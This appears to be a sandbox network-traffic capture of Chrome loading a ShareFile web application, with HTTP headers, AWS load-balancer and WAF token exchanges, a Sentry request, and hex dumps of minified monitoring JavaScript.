                                                                                                                                                                                                                      Cookie: AWSALBTG=EhbnCdp2674iUdAi0tzEBMd9KKHhUXjjPbW/07O1friWg2FQBD9drbCQoAOhrmgOjtNxnVhM7Umo1CSGVySSgN6Pb+FaOlLAAoA2zbnlaJGLzeePfMgc/4I9ePoGIkm93RWt4xWPn0jYDYp2jCfeG11aFpF0RFAIoufgUDnFGoAB; AWSALBTGCORS=EhbnCdp2674iUdAi0tzEBMd9KKHhUXjjPbW/07O1friWg2FQBD9drbCQoAOhrmgOjtNxnVhM7Umo1CSGVySSgN6Pb+FaOlLAAoA2zbnlaJGLzeePfMgc/4I9ePoGIkm93RWt4xWPn0jYDYp2jCfeG11aFpF0RFAIoufgUDnFGoAB; AWSALB=HPaRlb9XNhPMHa8/hEmODeucIk/UL0IkAlr3X0d7FS0Nxd/JlJDAT9O5k7ur/rFR4O1EKsTOvWA1ckFRYkQlogVPChLPKs2LgcpqMgDn/aKNEE5o6YxQQaKSSZsq; AWSALBCORS=HPaRlb9XNhPMHa8/hEmODeucIk/UL0IkAlr3X0d7FS0Nxd/JlJDAT9O5k7ur/rFR4O1EKsTOvWA1ckFRYkQlogVPChLPKs2LgcpqMgDn/aKNEE5o6YxQQaKSSZsq; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAgiCI0GEFAQAA:+SNh7mvQwlP/a7bOrkBO0LBXiWAGtEP9d+BlWdupFgRBzwqY5V2tfBfudBv/zYW894Zw3PpKHqLhRIRsbGyOy0d8vMdLQGs8N0w/rf6uyITgAdSCJOg6s7Ngh06RU+aqYWMPggUCO63E4WfnlZsL3VmaGIirmid7iio6uY4k3wCbUJgJTucxuXW/FJU7YAkQuEstLeFtY6IB2WdAkGNUiQ==
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC1431INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:06 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 310527
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e568937f"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC14953INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 36 30 5d 2c 7b 33 31 33 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 42 72 65 61 64 63 72 75 6d 62 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 6f 7d 2c 42 72 6f 77 73 65 72 43 6c 69 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 73 7d 2c 42 72 6f 77 73 65 72 50 72 6f 66 69 6c 69 6e 67
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1360],{31360:function(t,e,n){n.r(e),n.d(e,{Breadcrumbs:function(){return Do},BrowserClient:function(){return As},BrowserProfiling
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC16384INData Raw: 64 75 72 61 74 69 6f 6e 3d 65 2e 64 75 72 61 74 69 6f 6e 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 65 3d 74 2e 74 69 6d 65 73 74 61 6d 70 2d 74 2e 73 74 61 72 74 65 64 3b 74 2e 64 75 72 61 74 69 6f 6e 3d 65 3e 3d 30 3f 65 3a 30 7d 65 2e 72 65 6c 65 61 73 65 26 26 28 74 2e 72 65 6c 65 61 73 65 3d 65 2e 72 65 6c 65 61 73 65 29 2c 65 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 26 26 28 74 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 3d 65 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 29 2c 21 74 2e 69 70 41 64 64 72 65 73 73 26 26 65 2e 69 70 41 64 64 72 65 73 73 26 26 28 74 2e 69 70 41 64 64 72 65 73 73 3d 65 2e 69 70 41 64 64 72 65 73 73 29 2c 21 74 2e 75 73 65 72 41 67 65 6e 74 26 26 65 2e 75 73 65 72 41 67 65 6e 74 26 26 28 74 2e 75 73 65 72 41 67 65 6e 74 3d 65 2e 75 73 65 72 41 67 65
                                                                                                                                                                                                                      Data Ascii: duration=e.duration;else{const e=t.timestamp-t.started;t.duration=e>=0?e:0}e.release&&(t.release=e.release),e.environment&&(t.environment=e.environment),!t.ipAddress&&e.ipAddress&&(t.ipAddress=e.ipAddress),!t.userAgent&&e.userAgent&&(t.userAgent=e.userAge
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC941INData Raw: 7d 63 6f 6e 73 74 20 75 65 3d 22 3c 61 6e 6f 6e 79 6d 6f 75 73 3e 22 3b 66 75 6e 63 74 69 6f 6e 20 6c 65 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 6e 61 6d 65 7c 7c 75 65 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 75 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 74 2c 65 3d 31 30 30 2c 6e 3d 31 2f 30 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 68 65 28 22 22 2c 74 2c 65 2c 6e 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 7b 45 52 52 4f 52 3a 60 2a 2a 6e 6f 6e 2d 73 65 72 69 61 6c 69 7a 61 62 6c 65 2a 2a 20 28 24 7b 74 7d 29 60 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 74 2c 65 3d 33 2c 6e 3d 31 30 32 34 30 30 29 7b 63 6f 6e 73 74 20 72 3d 64 65 28 74 2c 65 29 3b
                                                                                                                                                                                                                      Data Ascii: }const ue="<anonymous>";function le(t){try{return t&&"function"==typeof t&&t.name||ue}catch(t){return ue}}function de(t,e=100,n=1/0){try{return he("",t,e,n)}catch(t){return{ERROR:`**non-serializable** (${t})`}}}function pe(t,e=3,n=102400){const r=de(t,e);
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC16384INData Raw: 74 75 72 6e 22 5b 47 6c 6f 62 61 6c 5d 22 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 65 3d 3d 3d 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 22 5b 57 69 6e 64 6f 77 5d 22 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 65 3d 3d 3d 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 22 5b 44 6f 63 75 6d 65 6e 74 5d 22 3b 69 66 28 5f 28 65 29 29 72 65 74 75 72 6e 22 5b 56 75 65 56 69 65 77 4d 6f 64 65 6c 5d 22 3b 69 66 28 68 28 72 3d 65 29 26 26 22 6e 61 74 69 76 65 45 76 65 6e 74 22 69 6e 20 72 26 26 22 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 22 69 6e 20 72 26 26 22 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 22 69 6e 20 72 29 72 65 74 75 72 6e 22 5b 53 79 6e
                                                                                                                                                                                                                      Data Ascii: turn"[Global]";if("undefined"!=typeof window&&e===window)return"[Window]";if("undefined"!=typeof document&&e===document)return"[Document]";if(_(e))return"[VueViewModel]";if(h(r=e)&&"nativeEvent"in r&&"preventDefault"in r&&"stopPropagation"in r)return"[Syn
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC16384INData Raw: 61 74 65 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 7d 3b 6e 26 26 6e 2e 73 64 6b 26 26 28 73 2e 73 64 6b 3d 7b 6e 61 6d 65 3a 6e 2e 73 64 6b 2e 6e 61 6d 65 2c 76 65 72 73 69 6f 6e 3a 6e 2e 73 64 6b 2e 76 65 72 73 69 6f 6e 7d 29 2c 72 26 26 65 26 26 28 73 2e 64 73 6e 3d 79 6e 28 65 29 29 3b 63 6f 6e 73 74 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 22 22 3b 66 6f 72 28 63 6f 6e 73 74 20 6e 20 6f 66 20 74 29 7b 63 6f 6e 73 74 20 74 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 6e 2e 74 61 67 73 29 2c 72 3d 74 2e 6c 65 6e 67 74 68 3e 30 3f 60 7c 23 24 7b 74 2e 6d 61 70 28 28 28 5b 74 2c 65 5d 29 3d 3e 60 24 7b 74 7d 3a 24 7b 65 7d 60 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 7d 60
                                                                                                                                                                                                                      Data Ascii: ate).toISOString()};n&&n.sdk&&(s.sdk={name:n.sdk.name,version:n.sdk.version}),r&&e&&(s.dsn=yn(e));const o=function(t){const e=function(t){let e="";for(const n of t){const t=Object.entries(n.tags),r=t.length>0?`|#${t.map((([t,e])=>`${t}:${e}`)).join(",")}`
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC16384INData Raw: 2e 2e 73 2e 67 65 74 50 72 6f 70 61 67 61 74 69 6f 6e 43 6f 6e 74 65 78 74 28 29 7d 3b 6f 3d 74 2e 73 74 61 72 74 54 72 61 6e 73 61 63 74 69 6f 6e 28 7b 74 72 61 63 65 49 64 3a 65 2c 70 61 72 65 6e 74 53 70 61 6e 49 64 3a 61 2c 70 61 72 65 6e 74 53 61 6d 70 6c 65 64 3a 63 2c 2e 2e 2e 6e 2c 6d 65 74 61 64 61 74 61 3a 7b 64 79 6e 61 6d 69 63 53 61 6d 70 6c 69 6e 67 43 6f 6e 74 65 78 74 3a 69 2c 2e 2e 2e 6e 2e 6d 65 74 61 64 61 74 61 7d 7d 29 7d 72 65 74 75 72 6e 20 46 72 28 6f 2c 73 2c 72 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4c 72 28 74 29 7b 69 66 28 74 2e 73 74 61 72 74 54 69 6d 65 29 7b 63 6f 6e 73 74 20 65 3d 7b 2e 2e 2e 74 7d 3b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3d 44 74 28 74 2e 73 74 61 72 74 54 69 6d 65 29 2c 64
                                                                                                                                                                                                                      Data Ascii: ..s.getPropagationContext()};o=t.startTransaction({traceId:e,parentSpanId:a,parentSampled:c,...n,metadata:{dynamicSamplingContext:i,...n.metadata}})}return Fr(o,s,r),o}function Lr(t){if(t.startTime){const e={...t};return e.startTimestamp=Dt(t.startTime),d
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC16384INData Raw: 72 6f 77 20 6d 73 2b 2b 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 7b 6d 73 2d 2d 7d 29 29 2c 52 65 28 28 6e 3d 3e 7b 6e 2e 61 64 64 45 76 65 6e 74 50 72 6f 63 65 73 73 6f 72 28 28 74 3d 3e 28 65 2e 6d 65 63 68 61 6e 69 73 6d 26 26 28 51 28 74 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 29 2c 74 74 28 74 2c 65 2e 6d 65 63 68 61 6e 69 73 6d 29 29 2c 74 2e 65 78 74 72 61 3d 7b 2e 2e 2e 74 2e 65 78 74 72 61 2c 61 72 67 75 6d 65 6e 74 73 3a 72 7d 2c 74 29 29 29 2c 5f 65 28 74 29 7d 29 29 2c 74 7d 7d 3b 74 72 79 7b 66 6f 72 28 63 6f 6e 73 74 20 65 20 69 6e 20 74 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 26 26 28 72 5b 65 5d 3d 74 5b 65 5d 29 7d 63 61 74 63 68 28 74 29 7b
                                                                                                                                                                                                                      Data Ascii: row ms++,setTimeout((()=>{ms--})),Re((n=>{n.addEventProcessor((t=>(e.mechanism&&(Q(t,void 0,void 0),tt(t,e.mechanism)),t.extra={...t.extra,arguments:r},t))),_e(t)})),t}};try{for(const e in t)Object.prototype.hasOwnProperty.call(t,e)&&(r[e]=t[e])}catch(t){
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 28 74 2c 65 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 65 2c 74 29 29 72 65 74 75 72 6e 20 62 73 26 26 4e 2e 77 61 72 6e 28 22 45 76 65 6e 74 20 64 72 6f 70 70 65 64 20 64 75 65 20 74 6f 20 62 65 69 6e 67 20 61 20 64 75 70 6c 69 63 61 74 65 20 6f 66 20 70 72 65 76 69 6f 75 73 6c 79 20 63 61 70 74 75 72 65 64 20 65 76 65 6e 74 2e 22 29 2c 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 3d 65 7d 7d 7d 2c 50 6f 3d 59 65 28 4e 6f 2c 4c 6f 29 3b 66 75 6e 63 74 69 6f 6e 20 24 6f 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 55 6f 28 74 29 2c 72 3d 55 6f 28 65 29 3b 69 66 28 21 6e 26 26 21 72 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 26 26 21 72 7c 7c 21 6e 26 26 72 29 72 65 74 75 72 6e 21 31
                                                                                                                                                                                                                      Data Ascii: n!1;return!0}(t,e))return!0;return!1}(e,t))return bs&&N.warn("Event dropped due to being a duplicate of previously captured event."),null}catch(t){}return t=e}}},Po=Ye(No,Lo);function $o(t,e){let n=Uo(t),r=Uo(e);if(!n&&!r)return!0;if(n&&!r||!n&&r)return!1
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6c 65 74 20 72 3b 63 6f 6e 73 74 20 73 3d 74 2e 65 78 65 63 28 65 2e 73 75 62 73 74 72 69 6e 67 28 6e 29 29 3b 72 65 74 75 72 6e 20 73 3f 28 72 3d 73 5b 30 5d 2c 6e 2b 3d 72 2e 6c 65 6e 67 74 68 2c 72 29 3a 22 22 7d 63 6f 6e 73 74 20 73 3d 5b 5d 3b 66 6f 72 28 3b 72 28 49 61 29 2c 21 28 6e 3e 3d 65 2e 6c 65 6e 67 74 68 29 3b 29 7b 6c 65 74 20 6f 3d 72 28 43 61 29 3b 69 66 28 22 2c 22 3d 3d 3d 6f 2e 73 6c 69 63 65 28 2d 31 29 29 6f 3d 52 61 28 74 2c 6f 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6f 2e 6c 65 6e 67 74 68 2d 31 29 29 2c 73 2e 70 75 73 68 28 6f 29 3b 65 6c 73 65 7b 6c 65 74 20 72 3d 22 22 3b 6f 3d 52 61 28 74 2c 6f 29 3b 6c 65 74 20 69 3d 21 31 3b 66 6f 72 28 3b 3b 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 63 68 61 72 41 74 28 6e 29 3b 69 66 28 22 22 3d
                                                                                                                                                                                                                      Data Ascii: let r;const s=t.exec(e.substring(n));return s?(r=s[0],n+=r.length,r):""}const s=[];for(;r(Ia),!(n>=e.length);){let o=r(Ca);if(","===o.slice(-1))o=Ra(t,o.substring(0,o.length-1)),s.push(o);else{let r="";o=Ra(t,o);let i=!1;for(;;){const t=e.charAt(n);if(""=
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 73 74 79 6c 65 49 44 4d 61 70 2e 68 61 73 28 74 29 7d 61 64 64 28 74 2c 65 29 7b 69 66 28 74 68 69 73 2e 68 61 73 28 74 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 49 64 28 74 29 3b 6c 65 74 20 6e 3b 72 65 74 75 72 6e 20 6e 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 74 68 69 73 2e 69 64 2b 2b 3a 65 2c 74 68 69 73 2e 73 74 79 6c 65 49 44 4d 61 70 2e 73 65 74 28 74 2c 6e 29 2c 74 68 69 73 2e 69 64 53 74 79 6c 65 4d 61 70 2e 73 65 74 28 6e 2c 74 29 2c 6e 7d 67 65 74 53 74 79 6c 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 64 53 74 79 6c 65 4d 61 70 2e 67 65 74 28 74 29 7c 7c 6e 75 6c 6c 7d 72 65 73 65 74 28 29 7b 74 68 69 73 2e 73 74 79 6c 65 49 44 4d 61 70 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 74 68 69 73 2e 69 64 53 74 79 6c 65 4d 61 70 3d 6e 65
                                                                                                                                                                                                                      Data Ascii: styleIDMap.has(t)}add(t,e){if(this.has(t))return this.getId(t);let n;return n=void 0===e?this.id++:e,this.styleIDMap.set(t,n),this.idStyleMap.set(n,t),n}getStyle(t){return this.idStyleMap.get(t)||null}reset(){this.styleIDMap=new WeakMap,this.idStyleMap=ne


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      27192.168.2.174974218.239.18.504437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC653OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 1275
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC1275OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 67 69 43 49 30 47 45 46 41 51 41 41 3a 2b 53 4e 68 37 6d 76 51 77 6c 50 2f 61 37 62 4f 72 6b 42 4f 30 4c 42 58 69 57 41 47 74 45 50 39 64 2b 42 6c 57 64 75 70 46 67 52 42 7a 77 71 59 35 56 32 74 66 42 66 75 64 42 76 2f 7a 59 57 38 39 34 5a 77 33 50 70 4b 48 71 4c 68 52 49 52 73 62 47 79 4f 79 30 64 38 76 4d 64 4c 51 47 73 38 4e 30 77 2f 72 66 36 75 79 49 54 67 41 64 53 43 4a 4f 67 36 73 37 4e 67 68 30 36 52 55 2b 61 71 59 57 4d 50 67 67 55 43 4f 36 33 45 34 57 66 6e 6c 5a 73 4c 33 56 6d 61 47 49 69 72 6d 69 64 37 69 69 6f 36 75 59 34 6b 33 77 43 62 55 4a 67 4a 54 75 63 78 75 58
                                                                                                                                                                                                                      Data Ascii: {"existing_token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAgiCI0GEFAQAA:+SNh7mvQwlP/a7bOrkBO0LBXiWAGtEP9d+BlWdupFgRBzwqY5V2tfBfudBv/zYW894Zw3PpKHqLhRIRsbGyOy0d8vMdLQGs8N0w/rf6uyITgAdSCJOg6s7Ngh06RU+aqYWMPggUCO63E4WfnlZsL3VmaGIirmid7iio6uY4k3wCbUJgJTucxuX
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 860
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a7-3a9558b440ca96c97b10bfdc
                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                      cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 6c60742ba67aa10b881e511aba8e470a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: oGh7bRHtW0_w33Ak5FgcLrMjFEkFBIcHPqdQXJbiOBAGzZjNeqT8rg==
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC860INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 63 71 57 49 74 75 62 54 41 41 41 41 3a 49 36 5a 2b 4f 59 73 4f 36 77 78 71 41 32 72 48 31 71 41 4f 36 4c 2b 42 64 77 6b 4c 52 2b 62 77 68 78 6e 76 61 51 56 66 74 75 52 2f 30 62 46 4b 43 72 65 51 57 31 4e 6e 7a 2b 57 71 2f 50 38 42 6f 75 51 43 4b 46 45 56 6c 63 75 4c 35 53 63 77 31 6e 5a 73 75 4d 4b 4a 56 32 4d 55 57 41 77 54 73 65 48 58 79 74 78 50 59 4e 72 2b 47 6e 41 58 66 4d 58 49 54 39 54 6b 69 77 62 45 4a 4d 54 68 5a 67 35 67 41 66 6a 78 64 39 76 6c 75 49 65 49 58 76 6a 72 63 57 34 46 57 48 32 31 36 6e 54 49 61 74 5a 52 72 7a 67 5a 45 44 72 48 66 62 51 42 68 31 38 66 75 49 2b 47 38 50 36 65 42 55 54
                                                                                                                                                                                                                      Data Ascii: {"token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAcqWItubTAAAA:I6Z+OYsO6wxqA2rH1qAO6L+BdwkLR+bwhxnvaQVftuR/0bFKCreQW1Nnz+Wq/P8BouQCKFEVlcuL5Scw1nZsuMKJV2MUWAwTseHXytxPYNr+GnAXfMXIT9TkiwbEJMThZg5gAfjxd9vluIeIXvjrcW4FWH216nTIatZRrzgZEDrHfbQBh18fuI+G8P6eBUT


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      28192.168.2.174974734.120.195.2494437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC486OUTGET /api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1 HTTP/1.1
                                                                                                                                                                                                                      Host: o49063.ingest.sentry.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC518INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                      allow: POST
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      29192.168.2.174974813.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC422OUTGET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 6490
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 26 Aug 2024 12:30:04 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
